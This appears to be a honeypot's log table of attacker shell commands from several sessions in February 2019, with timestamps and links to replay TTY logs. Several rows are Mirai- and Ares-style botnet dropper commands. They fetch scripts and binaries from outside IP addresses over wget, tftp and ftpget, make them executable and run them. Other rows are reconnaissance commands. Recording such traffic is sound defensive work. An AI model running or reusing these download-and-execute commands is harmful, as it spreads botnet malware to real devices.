Replay input by attackers captured by the honeypot system


InputSessiontimestampAction
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.236.212.240/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 87.236.212.240 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 87.236.212.240; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 87.236.212.240 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh64a3cf30ee1c2019-02-06 09:25:30Play TTY Log
busybox64a3cf30ee1c2019-02-06 09:25:19Play TTY Log
help64a3cf30ee1c2019-02-06 09:25:19Play TTY Log
sh64a3cf30ee1c2019-02-06 09:25:19Play TTY Log
shell64a3cf30ee1c2019-02-06 09:25:19Play TTY Log
/bin/busybox MIRAIc1ca82554a7f2019-02-06 09:16:53Play TTY Log
shc1ca82554a7f2019-02-06 09:16:52Play TTY Log
shellc1ca82554a7f2019-02-06 09:16:52Play TTY Log
systemc1ca82554a7f2019-02-06 09:16:52Play TTY Log
enablec1ca82554a7f2019-02-06 09:16:51Play TTY Log
./.updater telnetf83ae9fdd3202019-02-06 08:48:37Play TTY Log
./.updater telnet; /bin/busybox ARESf83ae9fdd3202019-02-06 08:48:37Play TTY Log
/bin/busybox rm -rf aresupdater; >.updater; /bin/busybox DARKf83ae9fdd3202019-02-06 08:48:37Play TTY Log
f83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busyboxf83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox cp /bin/busybox .updater; >.updater; /bin/busybox chmod 777 .updater; /bin/busybox DARKf83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox DARKf83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox rm -rf .updater aresupdaterf83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox wget http://46.183.218.243:80/33bi/Ares.x86 -O - > .updater; /bin/busybox chmod 777 .updater; /bin/busybox DARKf83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARKf83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/.ptmx && cd /f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/bin/.ptmx && cd /bin/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/boot/.ptmx && cd /boot/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/dev/.ptmx && cd /dev/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/dev/netslink/.ptmx && cd /dev/netslink/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/dev/shm/.ptmx && cd /dev/shm/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/etc/.ptmx && cd /etc/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/mnt/.ptmx && cd /mnt/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/tmp/.ptmx && cd /tmp/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/usr/.ptmx && cd /usr/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/var/.ptmx && cd /var/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/var/run/.ptmx && cd /var/run/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
>/var/tmp/.ptmx && cd /var/tmp/f83ae9fdd3202019-02-06 08:48:36Play TTY Log
do echof83ae9fdd3202019-02-06 08:48:36Play TTY Log
done < /bin/busyboxf83ae9fdd3202019-02-06 08:48:36Play TTY Log
enablef83ae9fdd3202019-02-06 08:48:36Play TTY Log
linuxshellf83ae9fdd3202019-02-06 08:48:36Play TTY Log
shf83ae9fdd3202019-02-06 08:48:36Play TTY Log
shellf83ae9fdd3202019-02-06 08:48:36Play TTY Log
systemf83ae9fdd3202019-02-06 08:48:36Play TTY Log
while read if83ae9fdd3202019-02-06 08:48:36Play TTY Log
/bin/busybox ARES7ef04aeb2bcc2019-02-06 08:48:30Play TTY Log
sh7ef04aeb2bcc2019-02-06 08:48:30Play TTY Log
shell7ef04aeb2bcc2019-02-06 08:48:29Play TTY Log
system7ef04aeb2bcc2019-02-06 08:48:28Play TTY Log
enable7ef04aeb2bcc2019-02-06 08:48:27Play TTY Log
cat /proc/cpuinfocaae125019ab2019-02-06 08:35:35Play TTY Log
ps -xcaae125019ab2019-02-06 08:35:34Play TTY Log
free -mcaae125019ab2019-02-06 08:35:33Play TTY Log
unamecaae125019ab2019-02-06 08:35:31Play TTY Log